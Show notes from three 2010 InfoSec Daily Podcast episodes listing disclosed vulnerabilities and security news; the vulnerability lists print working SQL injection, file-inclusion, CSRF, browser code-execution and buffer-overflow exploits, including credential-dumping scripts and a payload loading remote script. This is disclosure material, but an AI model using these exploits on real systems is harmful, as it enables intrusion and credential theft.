InfoSec Daily Podcast

 
ISD Podcast Episode 99 for March 31, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS MGMT 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS SEC 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Atlanta ISSA:
http://www.secureworldexpo.com/events/index.php?id=281
Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. WordPress My Category Order Plugin (mycategoryorder.php) is subject to a SQL Injection vulnerability because it fails to properly sansitize user supplied input in a SQL query.  Versions less than 2.8 are affected.  Exploit URL is available: http://www.sample.com/wp-admin/post-new.php?page=mycategoryorder&mode=act_OrderCategories&parentID=0′&idString=3,5,4,1
   2. AfterLogic WebMail Pro is subject to a Cross-Site Scripting vulnerability, allowing injection of malicious code in the context of the application.  Versions less than 4.7.10 are affected.  The targeted user must be logged in the webmail. This proof of concept was successfully tested in Firefox 3.5 and Internet Explorer 8.
      <html>
      <head>
      </head>
      <body >
      <form method=”post”
      action=”http://WEBSITE/history-storage.aspx?param=0.21188772204998574″
      onSubmit=”return false;”>
      <input value=”value”/>
      <input name=”HistoryStorageObjectName” value=”location;
      alert(‘xss’); //”/>
      </form>
      </body>
      </html>
      The vendor has made available a patched version. Update to AfterLogic Webmail Pro 4.7.11
   3. DreamPoll is subject to a Cross-Site Scripting and SQL Injection vulnerabilities in the application. These vulnerabilities could be exploited to make unauthorized changes to a web site or compromise a client accessing a site that utilizes the application.  Versions less than 4.7.10 are affected.  Example URLs are available: http://www.sample.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20

      http://www.sample.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20

   4. Docebo is subject to a Multiple SQL Injection vulnerabilities Versions 3.6.0.3 is affected. Google Dork: Powered by PHP Live! v3.2.1, Powered by PHP Live! v3.2.2 and allinurl:”request.php” “deptid”.  Example URLs are available: http://www.sample.com/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

      http://www.sample.com/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

      http://www.sample.com/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2

   5. Pepsi CMS (Irmin cms) is subject to multiple Local File Inclusion (LFI) vulnerabilities. Version pepsi-0.6-BETA2 is affected. Example URLs are available: http://www.sample.com/PATH/index.php?w=[LFI%]

      http://www.sample.com/PATH/includes/template-loader.php?_Root_Path=../../../../../../../../../etc/passwd%00

   6. Joomla Component com_guide is subject to a SQL Injection vulnerability. Example URLs are available: http://www.sample.com/index.php?option=com_guide&season=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12–
   7. Peazip is subject to a division by zero attack resulting in denial of service vulnerability.  Version 3.0 is affected, though others maybe as well.  To trigger the vulnerability open up the application, click tools, enter password / keyfile.

Stories of Interest:
News item 1:http://fcw.com/articles/2010/03/24/fose-cloud-computing-not-always-helpful-in-data-recovery.aspx
Newer technologies such as cloud computing can be a boon for post-disaster recovery of data, but they don’t always help much, Dennis Heretick, former chief information security officer for the Justice Department, said at a FOSE trade show session today.

“Cloud computing can provide more reliability, but that should not be assumed,” Heretick said. How a specific cloud application fits within an agency’s or company’s disaster recovery strategy should be assessed by each organization individually, he added.

Overall, in the last five years, disaster recovery and business continuity planning have become easier and less costly because of the availability of automated electronic storage processes for critical data, Heretick said.

Even so, there are hurdles to overcome in developing and implementing a disaster recovery plan and process. Some of the main obstacles include the difficulty of obtaining management support for disaster recovery goals and identifying and obtaining support for roles for individuals to perform in executing the plan, Heretick said.

News item 2:http://www.informationweek.com/news/security/attacks/showArticle.jhtml?articleID=224200279
Seventy-seven percent of C-level executives in a 115-person survey conducted in the U.K. say their organization has experienced a data breach at some point and all of them report attacks targeting corporate data in the past 12 months.

These findings come from a study released on Wednesday by IBM, a company that sells data protection services, and The Ponemon Institute, a privacy and information management research organization.

Larry Ponemon, founder of the group that bears his name, said that survey shows a shift in the way C-level executives think about security software. Investing in data protection, he said, is now seen as less expensive than recovering from a data breach.

Data protection initiatives on average, according to the survey, result in a cost savings or revenue improvement of 11 million ($16 million) for organizations.

InfoSec Daily Podcast

 
ISD Podcast Episode 98 for March 30, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Simple Machines Forum Avatar is subject to a Remote php File vulnerability.  This vulnerability allow execute a php external file in any visitor of the forum. The php file should have the malicious code. The scope of the attack depends on the strength of the php file.  This impacts version 1.1.8, though others may be vulnerable as well.  Proof of concept is available:
      <?php
      $ip = $_SERVER['REMOTE_ADDR'];
      $so= $_SERVER['HTTP_USER_AGENT'];
      $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
      $url= $_SERVER['PHP_SELF'];
      $path= $_SERVER['DOCUMENT_ROOT'];
      $archivo = ‘hacks.txt’;
      $fp = fopen($archivo, “a”);
      $string = ”
      Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC
      by Jose Luis Gongora Fernandez (aka) JosS

      $path$url

      VICTIM: $ip

      info: $so
      language: $lan

      “;
      $write = fputs($fp, $string);
      fclose($fp);
      ?>

   2. Joomla Component dcsFlashGames is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Version 2.0RC1 is impacted. Example URL is available:  http://www.sample.com/index.php?option=com_dcs_flashgames&Itemid=kaMtiEz&;catid=[INDONESIANCODER]
   3. Joomla Component com_solution is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_solution&Itemid=5&task=contry&con=-1+UNION+SELECT+1,2,3,4,5,6,7,8–
   4. Joomla Component com_units is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_units&task=unit&id=-1 UNIONSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28–
   5. Joomla Component com_tariff is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_tariff&detail=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11
   6. Joomla Component com_agency is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_agency&task=view&aid=-1 UNIONSELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14
   7. Joomla Component com_adds is subject to a Blind SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_adds&action=view&catid=12+AND+1=0+UNION+SELECT+1,2–
   8. Joomla Component com_departments is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_departments&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
   9. Joomla Component com_business is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_business&view=business&region=37&category_id=-1 UNION SELECT 1,2,3–
   10. Joomla Component com_radio is subject to a SQL Vulnerability because it fails to properly sanitize user supplied input in a SQL query. Example URL is available:  http://www.sample.com/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8–
   11. Asp – comersus7F Shopping Cart Software is subject to a Backup Dump Vulnerability. By default, comersus.mdb isn’t password-protected, and contains the order information (buyer’s address, phone, order status, tracking #, obs, etc), settings (encryption password, admin email, company information, etc) and shipment data.  Exploit URL is available:  http://www.sample.com/Comersus/database/comersus.mdb .
   12. Powie’s PSCRIPT Gästebuch is subject to a SQL Injection Vulnerability. All versions earlier than 2.09 are impacted.  Exploit URL is available: http://www.sample.com/gb/kommentar.php?id=99999+union+select+1,2,3,4,5,concat(nickname,0x3a,pwd,0x3a,email),7,8,9,10,11,12,13+from+pfuser+where+id=2

Stories of Interest:
News item 1: http://www.theregister.co.uk/2010/03/29/ie_emergency_fix/
Microsoft has announced plans to release an out-of-sequence patch, designed to resolve a zero-day vulnerability in Internet Explorer.

A cumulative update to Internet Explorer (MS10-018) plugs a security hole in IE 6 and IE 7 exploit by hackers over recent weeks. The latest version of Microsoft’s browser – IE 8 – is not vulnerable to the flaw, which Microsoft first acknowledged was a problem on 9 March.

The vulnerability involves a flaw in the iepeers.dll library involving the handling of invalid values passed to the “setAttribute()” function. Exploits create a means to drop malware onto the PCs of victims, providing they visit booby-trapped website using vulnerable version of IE.

News item 2: http://www.computerworld.com/s/article/9174337/Apple_delivers_record_monster_security_update?taxonomyId=17
Apple today patched 92 vulnerabilities, a third of them critical, in a record update to its Leopard and Snow Leopard operating systems.

Security Update 2010-002 plugged 92 holes in the client and server editions of Mac OS X 10.5 and Mac OS X 10.6, breaking a record that has stood since March 2008. The update dwarfed any released last year, when Apple’s largest patched 67 vulnerabilities.

Today’s security roll-up fixed flaws in 42 different applications or operating system components in Mac OS X, from AppKit and Application Firewall to unzip and X11, the Mac’s version of the X Window System.

News item 3: http://fcw.com/articles/2010/03/23/web-fose-bratton-lapd-cyber.aspx
Local police departments have the knowledge but lack the resources for cybersecurity-related police efforts, according to former Los Angeles Police Department Chief Bill Bratton.

Speaking as the keynote address at the FOSE 2010 trade show in Washington, Bratton said local police departments have been behind the curve for most of their history in tackling computer-related crime and cybersecurity.

Bratton, who also served as commissioner of the New York City Police Department, also said that computer security is an unmet challenge for police departments that is unlikely to be addressed in significant way because of funding, prioritization, resources and access to systems.

He added that the situation is frustrating for police chiefs. We know how to do it; we know how to coordinate it,” he said. “It.s a resource issue.”  Bratton is now chairman of Altegrity Risk International. He also previously served as chief of the New York City Transit Police and as Boston Police Department commissioner.

News item 4: http://www.ottawacitizen.com/technology/Canada+easy+prey+cyber+attacker+expert/2718450/story.html
Canada is woefully unprepared for a massive cyber-attack that is within the capabilities of any run-of-the-mill hacker, and which could cripple the business of the nation, warns a leading security expert.

Dragos Ruiu, an Edmonton-based computer security consultant, says it’s time for the government to protect complex computer networks that can now be hijacked with the simplest of tools.

“There has got to be a lot more thought and a lot more talk and a lot more brains applied to the situation,” said Ruiu. “The cyber-warfare world is the only place a 17-year-old kid can take on a nation-state and win.”

Ruiu, a key organizer of the CanSecWest Applied Security Conference in Vancouver, said that when it comes to computer security, even the popular pocket-sized smartphones are open to attack. He said this years conference will play host to a hacking contest to see which cellphone is the most secure.

News item 5:  http://news.bbc.co.uk/2/hi/europe/8586269.stm
A Frenchman who police say hacked Twitter accounts belonging to US President Barack Obama and celebrities could face jail. The unemployed 25-year-old was arrested on Tuesday after an operation lasting several months, conducted by French police with agents from the FBI.  The 25-year-old is said to have hacked into the micro-blogging website, by simply guessing users’ passwords.

The suspect reportedly targeted other celebrities, including Britney Spears. After being questioned by police, he was ordered to appear at court in the central French city of Clermont-Ferrand on 24 June.

InfoSec Daily Podcast

 
ISD Podcast Episode 97 for March 29, 2010.  This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.
Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

• May 8, 2010 Jeffersonville,  Indiana
• (No URL for that as of yet)
• Proceeds with be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. Pc4Uploader is subject to a Local File Include (LFI) vulnerability.  Version 9.0 – 10.0 are impacted.  Proof of Concept URL is available: http://www.sample.com/up/index.php?PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00
   2. AdaptCMS_Lite_1.5 is subject to change admin (user,passwd) & add new admin user vulnerability.  Version 1.5 2009-07-07 is impacted.  Exploit code is available:
      <html>
      <head>
      <body>
      <h2>coded by ahmadbady</h2>
      <form action=’admin.php?view=edit_users2&id=1′ method=’post’>
      <table cellpadding=’5′ cellspacing=’0′ border=’0′ width=’480′
      style=’padding-left:5px’ align=’left’>
      <tr><td>Username</td><td><input type=’text’
      name=’username1′ size=’16′
      value=’anything’
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td></tr><tr><td>New
      Password?</td><td><input type=’text’
      name=’password1′ size=’16′
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td></tr><tr><td>E-Mail</td><td><in
      put type=’text’ name=’email1′
      size=’16′ value=’anything’
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td></tr><tr><td>Level</td><td><sel
      ect name=’level’ style=’font-family:
      tahoma;
      font-size: 11px; border: 1px solid #444444;padding-left:1px’><option
      value=’Admin’
      selected>Admin – Level 1</option><option
      value=’Member’>Member – Level
      3</option>
      <option value=’Staff’>Staff – Level
      2</option></select></td></tr><tr><td>
      <input type=’submit’ value=’Update User’
      style=’font-family: tahoma; font-size: 11px; border: 1px solid
      #444444;padding-left:1px’>
      </td>
      </tr></table></form>
      </td></tr></table>
      </body>
      </html>
   3. 68kb is subject to multiple Remote File Include (RFI) vulnerabilities.  Version 1.0.0rc2 is impacted.  Example URL is available:

      http://www.sample.com/themes/front/default/modules/show.php?file=shell.txt?

      http://www.sample.com/themes/admin/default/modules/show.php?file=shell.txt?

   4. Netscape Navigator, Namoroka web browser and Flock browser are subject to a URL Code Execution vulnerability.  Version 9.0.0.6 of Netscape Navigator is impacted.  Exploit code is available:
      <html>
      <head>
      <title>firelinking By eidelweiss</title>

      <– Copyright (C) 2009-2010 firelinking by eidelweiss –>
      <– Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u) , and all
      my friends –>
      <– This PoC is cross platform : On Windows this example creates the
      file –>
      <– c:\mampus.bat and launches it (opens a dos box with a dir command).
      On –>
      <– Linux (tested Fedora Core) the example creates the file –>
      <– ~/mampus.txt Depending on caching the the script might –>
      <– run twice in some cases (this will create an additional
      mampus-1.txt). –>

      <link rel=”SHORTCUT ICON” href=”favicon.ico”>
      <script language=”JavaScript”
      type=”text/javascript”>
      var pf = navigator.platform.toLowerCase();
      if (pf.indexOf(“win”) != -1) {
      var os = “win”;
      } else if (pf.indexOf(“linux”) != -1) {
      var os = “linux”;
      }
      function GoFuck() {
      // this is a bad caching workaround inside
      document.getElementById(‘outhtml’).innerHTML = “”;
      document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘clearhtml’).value
      document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘clearhtml’).value
      document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘clearhtml’).value
      window.setTimeout(“document.getElementById(‘outhtml’).innerHTML +=
      document.getElementById(‘linkhtml_”+os+”‘).value”,300);
      }
      </script>
      </head>
      <body>
      <div style=”font-family:Verdana;font-size:11px;”>

      <div
      style=”font-family:Verdana;font-size:15px;font-weight:bold;”>f
      irelinking By eidelweiss</div>
      <br><br>
      <div style=”width:600px”>
      <div
      style=”display:none”></div>

      <textarea style=”display:none”>
      <link rel=”SHORTCUT ICON” href=”favicon.ico”>
      </textarea>

      <textarea id=”linkhtml_win”
      style=”display:none”>
      <link rel=”SHORTCUT ICON”
      href=”view-source:javascript:delayedOpenWindow(‘
      javascript:netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXP
      Connect\’);
      file=Components.classes[\'@mozilla.org/file/local;1\'].createInstance(Compo
      nents.interfaces.
      nsILocalFile);file.initWithPath(\’c:\\\\mampus.bat\’);file.createUnique(Com
      ponents.interfaces.
      nsIFile.NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.or
      g/network/
      file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputS
      tream);
      outputStream.init(file,0×04|0×08|0×20,420,0);output=\’@ECHO
      OFF\\n:BEGIN\\nCLS\\nDIR\\n
      PAUSE\\n:END\’;outputStream.write(output,output.length);outputStream.close(
      );file.launch();’,”,”)”>
      </textarea>

      <textarea
      style=”display:none”>
      <link rel=”SHORTCUT ICON”
      href=”view-source:javascript:delayedOpenWindow(‘javascript:
      netscape.security.PrivilegeManager.enablePrivilege(\’UniversalXPConnect\’);
      file=Components.
      classes[\'@mozilla.org/file/local;1\'].createInstance(Components.interfaces
      .nsILocalFile);file.
      initWithPath(\’~/mampus.txt\’);file.createUnique(Components.interfaces.nsIF
      ile.
      NORMAL_FILE_TYPE,420);outputStream=Components.classes[\'@mozilla.org/networ
      k/
      file-output-stream;1\'].createInstance(Components.interfaces.nsIFileOutputS
      tream);
      outputStream.init(file,0×04|0×08|0×20,420,0);output=\’mampus!\’;outputStrea
      m.write
      (output,output.length);outputStream.close();’,”,”)”>
      </textarea>
      <br><br>
      <a href=”#”>Run
      exploit</a>
      </div>
      </body>
      </html>

   5. Apple Safari is subject to a history search vulnerability.  Code Execution Exploit PoC is available:
      <!–
      Copyright (C) 2009-2010 firelinking by eidelweiss
      Greets: AL-MARHUM , [D]eal [C]yber , My Mother (i miss u)
      Credit: JosS (hackown) , r0073r & 0x1D (inj3ct0r) , YOGYACARDERLINK
      This P0C made for Educational Purpose only
      Author Will Be not responsible For Any Damage.
      –>

      <html>
      <script>
      function Dick() {
      window.open(‘safari:historysearch?q=%2A”><img src=\’Dick\’
      Dickonerror=’evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,11
      0,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73
      ,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,11
      9,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104
      ,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,
      59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,1
      00,67,104,105,108,100,40,113,41,59))\’>&p=1&s=1′);
      window.setTimeout(“location.href=’mailto:’”,6666);
      }
      </script>
      <body scrolling=”no”>
      <a href=”#”>Suck
      Please…</a>
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />

      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      <br />
      &lt;<img src=\’Dick\’
      Dickonerror=’evalalert(String.fromCharCode(113,61,100,111,99,117,109,101,11
      0,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,83,67,82,73
      ,80,84,34,41,59,113,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,11
      9,46,114,97,102,102,111,110,46,110,101,116,47,114,101,115,101,97,114,99,104
      ,47,111,112,101,114,97,47,104,105,115,116,111,114,121,47,111,46,106,115,34,
      59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,1
      00,67,104,105,108,100,40,113,41,59))’&gt;
      </body>
      </html>

   6. Open Web Analytics is subject to multiple file include vulnerabilities.  Version 1.2.3 is impacted.  Code PoC URL is available: http://www.sample.com/mw_plugin.php?IP=shell.txt?
   7. MyOWNspace is subject to multiple file include vulnerabilities.  Version 8.2 is impacted.  Example URLs are available: http://www.sample.com/graph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/myowngraph.php?go=../../../../../../../boot.ini%00

      http://www.sample.com/showmyownfriends.php?go=../../../../../../../boot.ini%00

   8. DaFun Spirit is subject to a Remote File Inclusion (RFI) vulnerability.  Version 2.2.5 is impacted.  Example URLs are available: http://www.sample.com/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]

      http://www.sample.com/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]

   9. Mini-Stream Ripper is subject to a local stack buffer overflow vulnerability.  Version 3.1.0.8 is impacted.  Exploit code is available:
      # Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
      # Author: Hazem Mofeed
      # Download: http://www.mini-stream.net/mini-stream-ripper/download/
      # Home: http://hakxer.wordpress.com

      # [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] –> Exploited ..
      # http://www.exploit-db.com/exploits/11607
      shellcode = (“xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0″
      “x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c”
      “x63x2ex65x78x65x00″) # SP3(sh)

      # exploit
      exploit = (“x41″ * 43496 + “x08x6Ax83x7C” +
      “x08x6Ax83x7C” + shellcode )
      file = open(“exploit.smi”,”w”)
      file.write(exploit)
      file.close()

   10. SiteX CMS is subject to a SQL injection vulnerability.  Version 0.7.4 Beta is impacted.  Exploit code is available:
       <?php
       echo
       “nn###########################################################################n”;
       echo “####n”;
       echo “## Product: SiteX CMS 0.7.4 beta (/photo.php) SQL-Injectionexploit ##n”;
       echo “## Usage: php.exe sitex.php www.site.com /cmspath/##n”;
       echo “## Require: Magic_quotes = off##n”;
       echo “## Author: Sc0rpi0n [RUS] (http://scorpion.su)##n”;
       echo “## Special for Antichat (forum.antichat.ru)##n”;
       echo “## Bugs find: Iceangel_, [x60]unu, .:[melkiy]:.##n”;
       echo “####n”;
       echo
       “###########################################################################nn”;
       $host=$argv[1];
       $path=$argv[2];
       $script=”photo.php?albumid=”;
       $sql=urlencode(“-1′ UNION SELECT
       1,concat(0x3a3a,username,0x3a3a3a,password,0x3a3a3a3a),3,4,5,6,7,8 FROM
       SiteX_Users WHERE — “);
       $fsock=fsockopen($host,80);
       $headers=”GET http://$host$path$script$sql HTTP/1.0rn”;
       $headers.=”Host: $hostrnrn”;
       fwrite($fsock,$headers);
       while(!feof($fsock))
       $response.=fread($fsock,1024);
       $pos1=strpos($response,”::”) or die(“## http://$host is not
       vulnerable or errorn”);
       $pos2=strpos($response,”:::”) or die(“## http://$host is not
       vulnerable or errorn”);
       $pos3=strpos($response,”::::”) or die(“## http://$host is
       not vulnerable or errorn”);
       $len1=$pos2-$pos1;
       $len2=$pos3-$pos2;

       $login=substr($response,$pos1+2,$len1-2);
       $password=substr($response,$pos2+3,$len2-3);

       echo “## Host: $argv[1]n”;
       echo “## Login: $loginn”;
       echo “## Password: $passwordn”;
       ?>

Stories of Interest:
News item 1: http://www.computerworld.com/s/article/9173965/FBI_lists_Top_10_posts_in_cybercriminal_operations?taxonomyId=17
Criminal hacker organizations are operating with increasing corporate-life efficiency, specialization and expertise, according to the FBI.

From a business perspective, these criminal enterprises are highly productive and staffed by dedicated people willing to operate worldwide, around the clock “without holidays, weekends or vacations,” according to
Steven Chabinsky, deputy assistant director in the FBI’s cyber division. “As a result, when an opportunity presents itself these criminals can start planning within hours.”

According to the FBI the top 10 positions in cyber criminal organizations are:

1. Coders/programmers, who write the exploits and malware used by the criminal enterprise. Contrary to popular belief, Chabinsky noted that coders who knowingly take part in a criminal enterprise are not protected by the First Amendment.
2. Distributors, who trade and sell stolen data and act as vouchers for the goods provided by other specialists.
3. Tech experts, who maintain the criminal enterprise’s IT infrastructure, including servers, encryption technologies, databases, and the like.
4. Hackers, who search for and exploit applications, systems and network vulnerabilities.
5. Fraudsters, who create and deploy various social engineering schemes, such as phishing and spam.
6. Hosted systems providers, who offer safe hosting of illicit content servers and sites.
7. Cashiers, who control drop accounts and provide names and accounts to other criminals for a fee.
8. Money mules, who complete wire transfers between bank accounts. The money mules may use student and work visas to travel to the U.S. to open bank accounts.
9. Tellers, who are charged with transferring and laundering illicitly gained proceeds through digital currency services and different world currencies.
10. Organization Leaders, often “people persons” without technical skills. The leaders assemble the team and choose the targets.

News item 2:http://www.computerworld.com/s/article/9174242/Military_warns_of_increasingly_active_cyber_threat_from_China_
On the same day that Google Inc. and the GoDaddy Group Inc. complained about China to a congressional committee, U.S. Navy Admiral Robert Willard appeared before the U.S. House Armed Services Committee with an even stronger warning about cyber-threats posed by China.

Willard’s comments about China received little press attention but were stronger than anything said by either company.

“U.S. military and government networks and computer systems continue to be the target of intrusions that appear to have originated from within the PRC (People’s Republic of China),” said Willard.

He said that most of the intrusions are focused on acquiring data “but the skills being demonstrated would also apply to network attacks.”

Willard testified on the military’s operations in its Pacific command, which he said “faces increasingly active and sophisticated threats to our information and computer infrastructure.”
News item 3: http://www.telegraph.co.uk/news/newstopics/howaboutthat/7532996/Ageing-spies-unable-to-use-the-internet.html
The Security Service is launching an unprecedented round of redundancies to improve the overall level of computer skills among its staff.

Despite an expanding budget, MI5 is laying off employees in order to hire new intelligence officers and support staff with better command of information technology and other “deployable” skills.

The redundancy programme has set tongues wagging in Whitehall, with civil servants in other departments joking about a “James Bond generation” of elderly spies being put out to pasture because they can’t use the internet and don’t understand the world of Twitter or Facebook.

The plan was disclosed by Jonathan Evans, the director-general of MI5. He told a Parliamentary committee that he is concerned that his agency’s overall IT skills are not up to scratch, leading him to get rid of some employees.

News item 4:http://www.kptv.com/news/22964989/detail.html
The theft of a computer from Molalla’s water treatment facility is being considered a federal crime by authorities.  Someone broke into the water plant Saturday night and stole the computer, which was what kept the plant working on auto pilot. Water service to Molalla has not been affected, but workers must operate the plant the old-fashioned way.

“It has to be manually run and also inspected (so) visual checks can be made,” said Marc Howatt, the city’s public works director.

The thieves broke into the water plant through a back window. Once inside, Howatt said, the thief triggered a motion detector and an on-call manager rushed to the facility and found the front door open and one of the computers gone.

